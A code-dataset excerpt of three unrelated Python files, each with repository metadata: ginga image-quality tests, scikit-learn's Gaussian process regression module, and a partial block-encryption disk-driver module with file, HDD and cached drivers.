assert result_4.x == 5
assert result_4.y == 4
assert_allclose(result_4.skylevel, 4199.05)
assert_allclose(result_4.background, 3961)
assert result_4.encircled_energy_fn is None
assert result_4.ensquared_energy_fn is None
result = self.iqcalc.objlist_select(
objlist, self.data.shape[1], self.data.shape[0])
assert len(result) == 1
result = self.iqcalc.objlist_select(
objlist, self.data.shape[1], self.data.shape[0], minfwhm=1.0, maxfwhm=2.0)
assert len(result) == 0
# NOTE: Inherited test methods also must satisfy inherited dependency checks
# from parent test class above. Not ideal if dependency is different but
# this avoids test code repetition.
@pytest.mark.skipif('not have_photutils')
class TestIQCalcPhotAstropy(TestIQCalcPhot):
def setup_class(self):
"""Customize for Astropy implementation."""
self.iqcalc = iqcalc_astropy.IQCalc(logger=self.logger)
@pytest.mark.skipif('not have_scipy')
class TestIQCalcFWHM:
# Shared attributes that subclass can access.
logger = logging.getLogger("TestIQCalc")
input_arrays = (
np.array([0., 0., 11., 12., 8., 9., 37., 96., 289., 786.,
1117., 795., 286., 86., 26., 18., 0., 8., 0., 0.]),
np.array([0., 9., 0., 0., 0., 34., 25., 60., 196., 602.,
1117., 1003., 413., 135., 29., 0., 3., 0., 4., 3.]))
def setup_class(self):
self.iqcalc = iqcalc.IQCalc(logger=self.logger)
self.fwhm_funcs = (self.iqcalc.calc_fwhm_gaussian,
self.iqcalc.calc_fwhm_moffat)
self.answers = ((2.8551, 2.7732), # Gaussian
(2.77949, 2.6735) # Moffat
)
def test_fwhm(self):
"""Test FWHM measuring function in 1D."""
for i, func in enumerate(self.fwhm_funcs):
for j, arr1d in enumerate(self.input_arrays):
res = func(arr1d)
assert_allclose(res.fwhm, self.answers[i][j], atol=1e-4)
class TestIQCalcFWHMAstropy(TestIQCalcFWHM):
def setup_class(self):
"""Customize for Astropy implementation."""
self.iqcalc = iqcalc_astropy.IQCalc(logger=self.logger)
self.fwhm_funcs = (self.iqcalc.calc_fwhm_gaussian,
self.iqcalc.calc_fwhm_moffat,
self.iqcalc.calc_fwhm_lorentz)
self.answers = ((2.8551, 2.7732), # Gaussian
(2.77949, 2.6735), # Moffat
(1.9570, 1.8113) # Lorentz
)
|
pllim/ginga
|
ginga/tests/test_iqcalc.py
|
Python
|
bsd-3-clause
| 12,829
|
[
"Gaussian"
] |
73dea002619e98992d78a50a3f3b53ddc88838de906ae081466c4cf27bfced66
|
# -*- coding: utf-8 -*-
# Author: Vincent Dubourg <vincent.dubourg@gmail.com>
# (mostly translation, see implementation details)
# Licence: BSD 3 clause
from __future__ import print_function
import numpy as np
from scipy import linalg, optimize
from ..base import BaseEstimator, RegressorMixin
from ..metrics.pairwise import manhattan_distances
from ..utils import check_random_state, check_array, check_X_y
from ..utils.validation import check_is_fitted
from . import regression_models as regression
from . import correlation_models as correlation
MACHINE_EPSILON = np.finfo(np.double).eps
def l1_cross_distances(X):
"""
Computes the nonzero componentwise L1 cross-distances between the vectors
in X.
Parameters
----------
X: array_like
An array with shape (n_samples, n_features)
Returns
-------
D: array with shape (n_samples * (n_samples - 1) / 2, n_features)
The array of componentwise L1 cross-distances.
ij: arrays with shape (n_samples * (n_samples - 1) / 2, 2)
The indices i and j of the vectors in X associated to the cross-
        distances in D: D[k] = np.abs(X[ij[k, 0]] - X[ij[k, 1]]).
"""
X = check_array(X)
n_samples, n_features = X.shape
n_nonzero_cross_dist = n_samples * (n_samples - 1) // 2
    ij = np.zeros((n_nonzero_cross_dist, 2), dtype=int)
D = np.zeros((n_nonzero_cross_dist, n_features))
ll_1 = 0
for k in range(n_samples - 1):
ll_0 = ll_1
ll_1 = ll_0 + n_samples - k - 1
ij[ll_0:ll_1, 0] = k
ij[ll_0:ll_1, 1] = np.arange(k + 1, n_samples)
D[ll_0:ll_1] = np.abs(X[k] - X[(k + 1):n_samples])
return D, ij
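# --- Editor's note: hedged sketch, not part of the original scikit-learn
# module. It makes the D/ij pairing above concrete; the three sample
# points are illustrative assumptions.
def _example_l1_cross_distances():
    import numpy as np
    X = np.array([[0., 0.], [1., 2.], [3., 1.]])
    D, ij = l1_cross_distances(X)
    # ij rows: (0, 1), (0, 2), (1, 2); D[0] == |X[0] - X[1]| == [1., 2.]
    return D, ij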
class GaussianProcess(BaseEstimator, RegressorMixin):
"""The Gaussian Process model class.
Parameters
----------
regr : string or callable, optional
A regression function returning an array of outputs of the linear
regression functional basis. The number of observations n_samples
should be greater than the size p of this basis.
Default assumes a simple constant regression trend.
Available built-in regression models are::
'constant', 'linear', 'quadratic'
corr : string or callable, optional
A stationary autocorrelation function returning the autocorrelation
between two points x and x'.
Default assumes a squared-exponential autocorrelation model.
Built-in correlation models are::
'absolute_exponential', 'squared_exponential',
'generalized_exponential', 'cubic', 'linear'
beta0 : double array_like, optional
The regression weight vector to perform Ordinary Kriging (OK).
Default assumes Universal Kriging (UK) so that the vector beta of
regression weights is estimated using the maximum likelihood
principle.
storage_mode : string, optional
A string specifying whether the Cholesky decomposition of the
correlation matrix should be stored in the class (storage_mode =
'full') or not (storage_mode = 'light').
Default assumes storage_mode = 'full', so that the
Cholesky decomposition of the correlation matrix is stored.
This might be a useful parameter when one is not interested in the
MSE and only plan to estimate the BLUP, for which the correlation
matrix is not required.
verbose : boolean, optional
A boolean specifying the verbose level.
Default is verbose = False.
theta0 : double array_like, optional
An array with shape (n_features, ) or (1, ).
The parameters in the autocorrelation model.
If thetaL and thetaU are also specified, theta0 is considered as
the starting point for the maximum likelihood estimation of the
best set of parameters.
Default assumes isotropic autocorrelation model with theta0 = 1e-1.
thetaL : double array_like, optional
An array with shape matching theta0's.
Lower bound on the autocorrelation parameters for maximum
likelihood estimation.
Default is None, so that it skips maximum likelihood estimation and
it uses theta0.
thetaU : double array_like, optional
An array with shape matching theta0's.
Upper bound on the autocorrelation parameters for maximum
likelihood estimation.
Default is None, so that it skips maximum likelihood estimation and
it uses theta0.
normalize : boolean, optional
Input X and observations y are centered and reduced wrt
means and standard deviations estimated from the n_samples
observations provided.
Default is normalize = True so that data is normalized to ease
maximum likelihood estimation.
nugget : double or ndarray, optional
Introduce a nugget effect to allow smooth predictions from noisy
data. If nugget is an ndarray, it must be the same length as the
number of data points used for the fit.
The nugget is added to the diagonal of the assumed training covariance;
in this way it acts as a Tikhonov regularization in the problem. In
the special case of the squared exponential correlation function, the
nugget mathematically represents the variance of the input values.
Default assumes a nugget close to machine precision for the sake of
robustness (nugget = 10. * MACHINE_EPSILON).
optimizer : string, optional
A string specifying the optimization algorithm to be used.
Default uses 'fmin_cobyla' algorithm from scipy.optimize.
Available optimizers are::
'fmin_cobyla', 'Welch'
        'Welch' optimizer is due to Welch et al., see reference [WBSWM1992]_.
        It consists of iterating over several one-dimensional optimizations
        instead of running one single multi-dimensional optimization.
random_start : int, optional
The number of times the Maximum Likelihood Estimation should be
performed from a random starting point.
The first MLE always uses the specified starting point (theta0),
the next starting points are picked at random according to an
exponential distribution (log-uniform on [thetaL, thetaU]).
Default does not use random starting point (random_start = 1).
random_state: integer or numpy.RandomState, optional
The generator used to shuffle the sequence of coordinates of theta in
the Welch optimizer. If an integer is given, it fixes the seed.
Defaults to the global numpy random number generator.
Attributes
----------
theta_ : array
Specified theta OR the best set of autocorrelation parameters (the \
sought maximizer of the reduced likelihood function).
reduced_likelihood_function_value_ : array
The optimal reduced likelihood function value.
Examples
--------
>>> import numpy as np
>>> from sklearn.gaussian_process import GaussianProcess
>>> X = np.array([[1., 3., 5., 6., 7., 8.]]).T
>>> y = (X * np.sin(X)).ravel()
>>> gp = GaussianProcess(theta0=0.1, thetaL=.001, thetaU=1.)
>>> gp.fit(X, y) # doctest: +ELLIPSIS
GaussianProcess(beta0=None...
...
Notes
-----
The present implementation is based on a translation of the DACE
Matlab toolbox, see reference [NLNS2002]_.
References
----------
.. [NLNS2002] `S.N. Lophaven, H.B. Nielsen and J. Sondergaard. DACE - A
MATLAB Kriging Toolbox.` (2002)
http://www2.imm.dtu.dk/~hbn/dace/dace.pdf
.. [WBSWM1992] `W.J. Welch, R.J. Buck, J. Sacks, H.P. Wynn, T.J. Mitchell,
and M.D. Morris (1992). Screening, predicting, and computer
experiments. Technometrics, 34(1) 15--25.`
http://www.jstor.org/pss/1269548
"""
_regression_types = {
'constant': regression.constant,
'linear': regression.linear,
'quadratic': regression.quadratic}
_correlation_types = {
'absolute_exponential': correlation.absolute_exponential,
'squared_exponential': correlation.squared_exponential,
'generalized_exponential': correlation.generalized_exponential,
'cubic': correlation.cubic,
'linear': correlation.linear}
_optimizer_types = [
'fmin_cobyla',
'Welch']
def __init__(self, regr='constant', corr='squared_exponential', beta0=None,
storage_mode='full', verbose=False, theta0=1e-1,
thetaL=None, thetaU=None, optimizer='fmin_cobyla',
random_start=1, normalize=True,
nugget=10. * MACHINE_EPSILON, random_state=None):
self.regr = regr
self.corr = corr
self.beta0 = beta0
self.storage_mode = storage_mode
self.verbose = verbose
self.theta0 = theta0
self.thetaL = thetaL
self.thetaU = thetaU
self.normalize = normalize
self.nugget = nugget
self.optimizer = optimizer
self.random_start = random_start
self.random_state = random_state
def fit(self, X, y):
"""
The Gaussian Process model fitting method.
Parameters
----------
X : double array_like
An array with shape (n_samples, n_features) with the input at which
observations were made.
y : double array_like
An array with shape (n_samples, ) or shape (n_samples, n_targets)
with the observations of the output to be predicted.
Returns
-------
gp : self
A fitted Gaussian Process model object awaiting data to perform
predictions.
"""
# Run input checks
self._check_params()
self.random_state = check_random_state(self.random_state)
# Force data to 2D numpy.array
X, y = check_X_y(X, y, multi_output=True, y_numeric=True)
self.y_ndim_ = y.ndim
if y.ndim == 1:
y = y[:, np.newaxis]
# Check shapes of DOE & observations
n_samples, n_features = X.shape
_, n_targets = y.shape
# Run input checks
self._check_params(n_samples)
# Normalize data or don't
if self.normalize:
X_mean = np.mean(X, axis=0)
X_std = np.std(X, axis=0)
y_mean = np.mean(y, axis=0)
y_std = np.std(y, axis=0)
X_std[X_std == 0.] = 1.
y_std[y_std == 0.] = 1.
# center and scale X if necessary
X = (X - X_mean) / X_std
y = (y - y_mean) / y_std
else:
X_mean = np.zeros(1)
X_std = np.ones(1)
y_mean = np.zeros(1)
y_std = np.ones(1)
# Calculate matrix of distances D between samples
D, ij = l1_cross_distances(X)
if (np.min(np.sum(D, axis=1)) == 0.
and self.corr != correlation.pure_nugget):
raise Exception("Multiple input features cannot have the same"
" target value.")
# Regression matrix and parameters
F = self.regr(X)
n_samples_F = F.shape[0]
if F.ndim > 1:
p = F.shape[1]
else:
p = 1
if n_samples_F != n_samples:
raise Exception("Number of rows in F and X do not match. Most "
"likely something is going wrong with the "
"regression model.")
if p > n_samples_F:
raise Exception(("Ordinary least squares problem is undetermined "
"n_samples=%d must be greater than the "
"regression model size p=%d.") % (n_samples, p))
if self.beta0 is not None:
if self.beta0.shape[0] != p:
raise Exception("Shapes of beta0 and F do not match.")
# Set attributes
self.X = X
self.y = y
self.D = D
self.ij = ij
self.F = F
self.X_mean, self.X_std = X_mean, X_std
self.y_mean, self.y_std = y_mean, y_std
# Determine Gaussian Process model parameters
if self.thetaL is not None and self.thetaU is not None:
# Maximum Likelihood Estimation of the parameters
if self.verbose:
print("Performing Maximum Likelihood Estimation of the "
"autocorrelation parameters...")
self.theta_, self.reduced_likelihood_function_value_, par = \
self._arg_max_reduced_likelihood_function()
if np.isinf(self.reduced_likelihood_function_value_):
raise Exception("Bad parameter region. "
"Try increasing upper bound")
else:
# Given parameters
if self.verbose:
print("Given autocorrelation parameters. "
"Computing Gaussian Process model parameters...")
self.theta_ = self.theta0
self.reduced_likelihood_function_value_, par = \
self.reduced_likelihood_function()
if np.isinf(self.reduced_likelihood_function_value_):
raise Exception("Bad point. Try increasing theta0.")
self.beta = par['beta']
self.gamma = par['gamma']
self.sigma2 = par['sigma2']
self.C = par['C']
self.Ft = par['Ft']
self.G = par['G']
if self.storage_mode == 'light':
# Delete heavy data (it will be computed again if required)
# (it is required only when MSE is wanted in self.predict)
if self.verbose:
print("Light storage mode specified. "
"Flushing autocorrelation matrix...")
self.D = None
self.ij = None
self.F = None
self.C = None
self.Ft = None
self.G = None
return self
def predict(self, X, eval_MSE=False, batch_size=None):
"""
This function evaluates the Gaussian Process model at x.
Parameters
----------
X : array_like
An array with shape (n_eval, n_features) giving the point(s) at
which the prediction(s) should be made.
eval_MSE : boolean, optional
A boolean specifying whether the Mean Squared Error should be
evaluated or not.
Default assumes eval_MSE = False and evaluates only the BLUP (mean
prediction).
batch_size : integer, optional
An integer giving the maximum number of points that can be
evaluated simultaneously (depending on the available memory).
Default is None so that all given points are evaluated at the same
time.
Returns
-------
y : array_like, shape (n_samples, ) or (n_samples, n_targets)
An array with shape (n_eval, ) if the Gaussian Process was trained
on an array of shape (n_samples, ) or an array with shape
(n_eval, n_targets) if the Gaussian Process was trained on an array
of shape (n_samples, n_targets) with the Best Linear Unbiased
Prediction at x.
MSE : array_like, optional (if eval_MSE == True)
An array with shape (n_eval, ) or (n_eval, n_targets) as with y,
with the Mean Squared Error at x.
"""
check_is_fitted(self, "X")
# Check input shapes
X = check_array(X)
n_eval, _ = X.shape
n_samples, n_features = self.X.shape
n_samples_y, n_targets = self.y.shape
# Run input checks
self._check_params(n_samples)
if X.shape[1] != n_features:
raise ValueError(("The number of features in X (X.shape[1] = %d) "
"should match the number of features used "
"for fit() "
"which is %d.") % (X.shape[1], n_features))
if batch_size is None:
# No memory management
# (evaluates all given points in a single batch run)
# Normalize input
X = (X - self.X_mean) / self.X_std
# Initialize output
y = np.zeros(n_eval)
if eval_MSE:
MSE = np.zeros(n_eval)
# Get pairwise componentwise L1-distances to the input training set
dx = manhattan_distances(X, Y=self.X, sum_over_features=False)
# Get regression function and correlation
f = self.regr(X)
r = self.corr(self.theta_, dx).reshape(n_eval, n_samples)
# Scaled predictor
y_ = np.dot(f, self.beta) + np.dot(r, self.gamma)
# Predictor
y = (self.y_mean + self.y_std * y_).reshape(n_eval, n_targets)
if self.y_ndim_ == 1:
y = y.ravel()
# Mean Squared Error
if eval_MSE:
C = self.C
if C is None:
# Light storage mode (need to recompute C, F, Ft and G)
if self.verbose:
print("This GaussianProcess used 'light' storage mode "
"at instantiation. Need to recompute "
"autocorrelation matrix...")
reduced_likelihood_function_value, par = \
self.reduced_likelihood_function()
self.C = par['C']
self.Ft = par['Ft']
self.G = par['G']
rt = linalg.solve_triangular(self.C, r.T, lower=True)
if self.beta0 is None:
# Universal Kriging
u = linalg.solve_triangular(self.G.T,
np.dot(self.Ft.T, rt) - f.T,
lower=True)
else:
# Ordinary Kriging
u = np.zeros((n_targets, n_eval))
MSE = np.dot(self.sigma2.reshape(n_targets, 1),
(1. - (rt ** 2.).sum(axis=0)
+ (u ** 2.).sum(axis=0))[np.newaxis, :])
MSE = np.sqrt((MSE ** 2.).sum(axis=0) / n_targets)
# Mean Squared Error might be slightly negative depending on
# machine precision: force to zero!
MSE[MSE < 0.] = 0.
if self.y_ndim_ == 1:
MSE = MSE.ravel()
return y, MSE
else:
return y
else:
# Memory management
if type(batch_size) is not int or batch_size <= 0:
raise Exception("batch_size must be a positive integer")
if eval_MSE:
y, MSE = np.zeros(n_eval), np.zeros(n_eval)
n_batches = int(np.ceil(float(n_eval) / batch_size))
for k in range(n_batches):
batch_from = k * batch_size
batch_to = min((k + 1) * batch_size, n_eval)
y[batch_from:batch_to], MSE[batch_from:batch_to] = \
self.predict(X[batch_from:batch_to],
eval_MSE=eval_MSE, batch_size=None)
return y, MSE
else:
y = np.zeros(n_eval)
n_batches = int(np.ceil(float(n_eval) / batch_size))
for k in range(n_batches):
batch_from = k * batch_size
batch_to = min((k + 1) * batch_size, n_eval)
y[batch_from:batch_to] = \
self.predict(X[batch_from:batch_to],
eval_MSE=eval_MSE, batch_size=None)
return y
def reduced_likelihood_function(self, theta=None):
"""
This function determines the BLUP parameters and evaluates the reduced
likelihood function for the given autocorrelation parameters theta.
Maximizing this function wrt the autocorrelation parameters theta is
equivalent to maximizing the likelihood of the assumed joint Gaussian
distribution of the observations y evaluated onto the design of
experiments X.
Parameters
----------
theta : array_like, optional
An array containing the autocorrelation parameters at which the
Gaussian Process model parameters should be determined.
Default uses the built-in autocorrelation parameters
(ie ``theta = self.theta_``).
Returns
-------
reduced_likelihood_function_value : double
The value of the reduced likelihood function associated to the
given autocorrelation parameters theta.
par : dict
A dictionary containing the requested Gaussian Process model
parameters:
sigma2
Gaussian Process variance.
beta
Generalized least-squares regression weights for
Universal Kriging or given beta0 for Ordinary
Kriging.
gamma
Gaussian Process weights.
C
Cholesky decomposition of the correlation matrix [R].
Ft
Solution of the linear equation system : [R] x Ft = F
G
QR decomposition of the matrix Ft.
"""
check_is_fitted(self, "X")
if theta is None:
# Use built-in autocorrelation parameters
theta = self.theta_
# Initialize output
reduced_likelihood_function_value = - np.inf
par = {}
# Retrieve data
n_samples = self.X.shape[0]
D = self.D
ij = self.ij
F = self.F
if D is None:
# Light storage mode (need to recompute D, ij and F)
D, ij = l1_cross_distances(self.X)
if (np.min(np.sum(D, axis=1)) == 0.
and self.corr != correlation.pure_nugget):
raise Exception("Multiple X are not allowed")
F = self.regr(self.X)
# Set up R
r = self.corr(theta, D)
R = np.eye(n_samples) * (1. + self.nugget)
R[ij[:, 0], ij[:, 1]] = r
R[ij[:, 1], ij[:, 0]] = r
# Cholesky decomposition of R
try:
C = linalg.cholesky(R, lower=True)
except linalg.LinAlgError:
return reduced_likelihood_function_value, par
# Get generalized least squares solution
Ft = linalg.solve_triangular(C, F, lower=True)
try:
Q, G = linalg.qr(Ft, econ=True)
except Exception:
# scipy removed the deprecated ``econ`` keyword after 0.7; newer
# releases expose the economy transform through mode='economic'.
Q, G = linalg.qr(Ft, mode='economic')
sv = linalg.svd(G, compute_uv=False)
rcondG = sv[-1] / sv[0]
if rcondG < 1e-10:
# Check F
sv = linalg.svd(F, compute_uv=False)
condF = sv[0] / sv[-1]
if condF > 1e15:
raise Exception("F is too ill conditioned. Poor combination "
"of regression model and observations.")
else:
# Ft is too ill conditioned, get out (try different theta)
return reduced_likelihood_function_value, par
Yt = linalg.solve_triangular(C, self.y, lower=True)
if self.beta0 is None:
# Universal Kriging
beta = linalg.solve_triangular(G, np.dot(Q.T, Yt))
else:
# Ordinary Kriging
beta = np.array(self.beta0)
rho = Yt - np.dot(Ft, beta)
sigma2 = (rho ** 2.).sum(axis=0) / n_samples
# The determinant of R is equal to the squared product of the diagonal
# elements of its Cholesky decomposition C
detR = (np.diag(C) ** (2. / n_samples)).prod()
# Compute/Organize output
reduced_likelihood_function_value = - sigma2.sum() * detR
par['sigma2'] = sigma2 * self.y_std ** 2.
par['beta'] = beta
par['gamma'] = linalg.solve_triangular(C.T, rho)
par['C'] = C
par['Ft'] = Ft
par['G'] = G
return reduced_likelihood_function_value, par
def _arg_max_reduced_likelihood_function(self):
"""
This function estimates the autocorrelation parameters theta as the
maximizer of the reduced likelihood function.
(Minimization of the opposite reduced likelihood function is used for
convenience)
Parameters
----------
self : All parameters are stored in the Gaussian Process model object.
Returns
-------
optimal_theta : array_like
The best set of autocorrelation parameters (the sought maximizer of
the reduced likelihood function).
optimal_reduced_likelihood_function_value : double
The optimal reduced likelihood function value.
optimal_par : dict
The BLUP parameters associated to thetaOpt.
"""
# Initialize output
best_optimal_theta = []
best_optimal_rlf_value = []
best_optimal_par = []
if self.verbose:
print("The chosen optimizer is: " + str(self.optimizer))
if self.random_start > 1:
print(str(self.random_start) + " random starts are required.")
percent_completed = 0.
# Force optimizer to fmin_cobyla if the model is meant to be isotropic
if self.optimizer == 'Welch' and self.theta0.size == 1:
self.optimizer = 'fmin_cobyla'
if self.optimizer == 'fmin_cobyla':
def minus_reduced_likelihood_function(log10t):
return - self.reduced_likelihood_function(
theta=10. ** log10t)[0]
constraints = []
for i in range(self.theta0.size):
constraints.append(lambda log10t, i=i:
log10t[i] - np.log10(self.thetaL[0, i]))
constraints.append(lambda log10t, i=i:
np.log10(self.thetaU[0, i]) - log10t[i])
for k in range(self.random_start):
if k == 0:
# Use specified starting point as first guess
theta0 = self.theta0
else:
# Generate a random starting point log10-uniformly
# distributed between bounds
log10theta0 = np.log10(self.thetaL) \
+ self.random_state.rand(self.theta0.size).reshape(
self.theta0.shape) * np.log10(self.thetaU
/ self.thetaL)
theta0 = 10. ** log10theta0
# Run Cobyla
try:
log10_optimal_theta = \
optimize.fmin_cobyla(minus_reduced_likelihood_function,
np.log10(theta0), constraints,
iprint=0)
except ValueError as ve:
print("Optimization failed. Try increasing the ``nugget``")
raise ve
optimal_theta = 10. ** log10_optimal_theta
optimal_rlf_value, optimal_par = \
self.reduced_likelihood_function(theta=optimal_theta)
# Compare the new optimizer to the best previous one
if k > 0:
if optimal_rlf_value > best_optimal_rlf_value:
best_optimal_rlf_value = optimal_rlf_value
best_optimal_par = optimal_par
best_optimal_theta = optimal_theta
else:
best_optimal_rlf_value = optimal_rlf_value
best_optimal_par = optimal_par
best_optimal_theta = optimal_theta
if self.verbose and self.random_start > 1:
if (20 * k) / self.random_start > percent_completed:
percent_completed = (20 * k) / self.random_start
print("%s completed" % (5 * percent_completed))
optimal_rlf_value = best_optimal_rlf_value
optimal_par = best_optimal_par
optimal_theta = best_optimal_theta
elif self.optimizer == 'Welch':
# Back up the given attributes
theta0, thetaL, thetaU = self.theta0, self.thetaL, self.thetaU
corr = self.corr
verbose = self.verbose
# This will iterate over fmin_cobyla optimizer
self.optimizer = 'fmin_cobyla'
self.verbose = False
# Initialize under isotropy assumption
if verbose:
print("Initialize under isotropy assumption...")
self.theta0 = check_array(self.theta0.min())
self.thetaL = check_array(self.thetaL.min())
self.thetaU = check_array(self.thetaU.max())
theta_iso, optimal_rlf_value_iso, par_iso = \
self._arg_max_reduced_likelihood_function()
optimal_theta = theta_iso + np.zeros(theta0.shape)
# Iterate over all dimensions of theta allowing for anisotropy
if verbose:
print("Now improving allowing for anisotropy...")
for i in self.random_state.permutation(theta0.size):
if verbose:
print("Proceeding along dimension %d..." % (i + 1))
self.theta0 = check_array(theta_iso)
self.thetaL = check_array(thetaL[0, i])
self.thetaU = check_array(thetaU[0, i])
def corr_cut(t, d):
return corr(check_array(np.hstack([optimal_theta[0][0:i],
t[0],
optimal_theta[0][(i +
1)::]])),
d)
self.corr = corr_cut
optimal_theta[0, i], optimal_rlf_value, optimal_par = \
self._arg_max_reduced_likelihood_function()
# Restore the given attributes
self.theta0, self.thetaL, self.thetaU = theta0, thetaL, thetaU
self.corr = corr
self.optimizer = 'Welch'
self.verbose = verbose
else:
raise NotImplementedError("This optimizer ('%s') is not "
"implemented yet. Please contribute!"
% self.optimizer)
return optimal_theta, optimal_rlf_value, optimal_par
def _check_params(self, n_samples=None):
# Check regression model
if not callable(self.regr):
if self.regr in self._regression_types:
self.regr = self._regression_types[self.regr]
else:
raise ValueError("regr should be one of %s or callable, "
"%s was given."
% (self._regression_types.keys(), self.regr))
# Check regression weights if given (Ordinary Kriging)
if self.beta0 is not None:
self.beta0 = check_array(self.beta0)
if self.beta0.shape[1] != 1:
# Force to column vector
self.beta0 = self.beta0.T
# Check correlation model
if not callable(self.corr):
if self.corr in self._correlation_types:
self.corr = self._correlation_types[self.corr]
else:
raise ValueError("corr should be one of %s or callable, "
"%s was given."
% (self._correlation_types.keys(), self.corr))
# Check storage mode
if self.storage_mode != 'full' and self.storage_mode != 'light':
raise ValueError("Storage mode should either be 'full' or "
"'light', %s was given." % self.storage_mode)
# Check correlation parameters
self.theta0 = check_array(self.theta0)
lth = self.theta0.size
if self.thetaL is not None and self.thetaU is not None:
self.thetaL = check_array(self.thetaL)
self.thetaU = check_array(self.thetaU)
if self.thetaL.size != lth or self.thetaU.size != lth:
raise ValueError("theta0, thetaL and thetaU must have the "
"same length.")
if np.any(self.thetaL <= 0) or np.any(self.thetaU < self.thetaL):
raise ValueError("The bounds must satisfy O < thetaL <= "
"thetaU.")
elif self.thetaL is None and self.thetaU is None:
if np.any(self.theta0 <= 0):
raise ValueError("theta0 must be strictly positive.")
elif self.thetaL is None or self.thetaU is None:
raise ValueError("thetaL and thetaU should either be both or "
"neither specified.")
# Force verbose type to bool
self.verbose = bool(self.verbose)
# Force normalize type to bool
self.normalize = bool(self.normalize)
# Check nugget value
self.nugget = np.asarray(self.nugget)
if np.any(self.nugget < 0.):
raise ValueError("nugget must be positive or zero.")
if (n_samples is not None
and self.nugget.shape not in [(), (n_samples,)]):
raise ValueError("nugget must be either a scalar "
"or array of length n_samples.")
# Check optimizer
if self.optimizer not in self._optimizer_types:
raise ValueError("optimizer should be one of %s"
% self._optimizer_types)
# Force random_start type to int
self.random_start = int(self.random_start)
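# ---------------------------------------------------------------------
# Illustrative usage sketch (added for exposition; not part of the
# original module). A minimal end-to-end run of the class above on a toy
# 1-D problem: fit with maximum likelihood estimation of theta, then
# query the BLUP together with its mean squared error.
if __name__ == "__main__":
    import numpy as np
    X_demo = np.atleast_2d([1., 3., 5., 6., 7., 8.]).T
    y_demo = (X_demo * np.sin(X_demo)).ravel()
    gp_demo = GaussianProcess(theta0=1e-1, thetaL=1e-4, thetaU=1.)
    gp_demo.fit(X_demo, y_demo)
    x_query = np.atleast_2d(np.linspace(0., 10., 20)).T
    y_pred, mse = gp_demo.predict(x_query, eval_MSE=True)
    # y_pred is the mean prediction, mse its pointwise variance estimate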
|
shikhardb/scikit-learn
|
sklearn/gaussian_process/gaussian_process.py
|
Python
|
bsd-3-clause
| 34,542
|
[
"Gaussian"
] |
ac4fd1a44c41b98062481f9f79194d7b1b5a7e4f50a27a9229ddc4e4ab3441d1
|
import os
import struct
import logging
from collections import deque
from dropbox import client, rest, session
from StringIO import StringIO
from util import *
import re
from appkeys import *
#use /dev/random if security matters
class WrongDiskSize(Exception):
def __init__(self,message):
super(WrongDiskSize, self).__init__()
self.message=message
#TODO: should inherit from EncryptedBlockDevice
class DiskDriver(object):
#TODO: use *args and **kwargs
def __init__(self,size,sector_size):
logging.basicConfig(filename='blockcrypt.log',level=logging.DEBUG)
self.size = size
self.sector_size = sector_size
self.logger = logging.getLogger("blockcrypt")
if size % sector_size != 0:
print "DD init received %d %d" %(size,sector_size)
raise WrongDiskSize("disk size must the multiple of sector size %d %d" % (size,sector_size))
def read(self,sector):
pass
def write(self,data):
pass
def flush(self):
pass
@staticmethod
def create_disk():
pass
class FileBasedDiskDriver(DiskDriver):
def __init__(self,fp,size,sector_size,disk_begin=0):
super(FileBasedDiskDriver,self).__init__(size,sector_size)
self.fp = fp
self.disk_begin = disk_begin
def write(self,sector,data):
offset = self.sector_size*sector+self.disk_begin
self.logger.debug("FDD: write %d data at %d, sector: %d",len(data),offset,sector)
self.fp.seek(offset)
self.fp.write(data)
def read(self,sector):
offset = self.sector_size*sector+self.disk_begin
self.fp.seek(offset)
self.logger.debug("FDD: read offset %d, sector %d, tell %d", offset,sector,self.fp.tell())
buf = self.fp.read(self.sector_size)
return buf
#TODO: source should be random, urandom is for speed
def flush(self):
self.fp.flush()
class FileDiskDriver(FileBasedDiskDriver):
def __init__(self,filename):
fp = open(filename,"r+b")
(size,sector_size,disk_begin) = self.read_disk_info(filename)
super(FileDiskDriver,self).__init__(fp,size,sector_size,disk_begin)
@staticmethod
def read_disk_info(filename):
fp = open(filename,'rb')
info_size = struct.calcsize('Q')
info = fp.read(info_size)
disk_begin = info_size
size = os.stat(filename).st_size - info_size
fp.close()
sector_size = struct.unpack('Q', info)[0]
return (size,sector_size,disk_begin)
@staticmethod
def create_disk(filename, disk_size,sector_size,rand_source='/dev/urandom'):
fp = open(filename, "wb")
header = struct.pack('Q', sector_size)
fp.write(header)
left = disk_size
while left > 0:
# write full sectors while we can; the last chunk may be shorter
if left >= sector_size:
to_write = sector_size
else:
to_write = left
data = get_random_sector(sector_size,rand_source)
fp.write(data[:to_write])
left -= to_write
fp.flush()
fp.close()
class HDDDiskDriver(FileBasedDiskDriver):
def __init__(self,disk):
fp = open(disk,'r+b')
(size,sector_size) = self.get_sector_size(disk)
super(HDDDiskDriver,self).__init__(fp,size,sector_size)
@staticmethod
def get_sector_size(disk):
dev = disk.split('/')[-1]
name = re.sub("[^a-zA-Z]", "", dev)
path = "/sys/block/" + name
sector_size = int(open(path + "/queue/hw_sector_size", 'r').read())
# assumes a partition node like /dev/sda1 (its size file lives under
# the parent disk directory in /sys, in 512-byte units)
size = int(open(path + "/" + dev + "/size", 'r').read()) * 512
return (size,sector_size)
class CachedDiskDriver(DiskDriver):
#TODO: change to *args & **kwargs
"""
the unit of cache_size is number of sectors
"""
def __init__(self,size,sector_size,cache_size):
super(CachedDiskDriver,self).__init__(size,sector_size)
print "cached init called"
self.sectors_accessed = deque()
self.sector_cache = {}
self.cache_size = cache_size
def read(self,sector):
sector_cache = self.sector_cache
sectors_accessed=self.sectors_accessed
if sector in sector_cache:
self.update_sector_status(sector)
data = sector_cache[sector]
else:
self.make_space()
data = self.get_sector(sector)
sector_cache[sector]=data
sectors_accessed.appendleft(sector)
return data
def write(self,sector,data):
sector_cache = self.sector_cache
sectors_accessed=self.sectors_accessed
if sector in sector_cache:
self.update_sector_status(sector)
sector_cache[sector]=data
else:
self.make_space()
sector_cache[sector]=data
sectors_accessed.appendleft(sector)
def update_sector_status(self,sector):
self.sectors_accessed.remove(sector)
self.sectors_accessed.appendleft(sector)
def make_space(self):
if len(self.sectors_accessed) > self.cache_size:
self.uncache_last()
def uncache_last(self):
sector = self.sectors_accessed.pop()
data = self.sector_cache.pop(sector)
self.write_sector(sector,data)
def flush(self):
sector_cache = self.sector_cache
sectors_accessed=self.sectors_accessed
for sector in sectors_accessed:
self.write_sector(sector,sector_cache[sector])
def get_sector(self,sector):
pass
def write_sector(self,sector,data):
pass
class DropboxDiskDriver(CachedDiskDriver):
def __init__(self,cache_size):
self.authenticate()
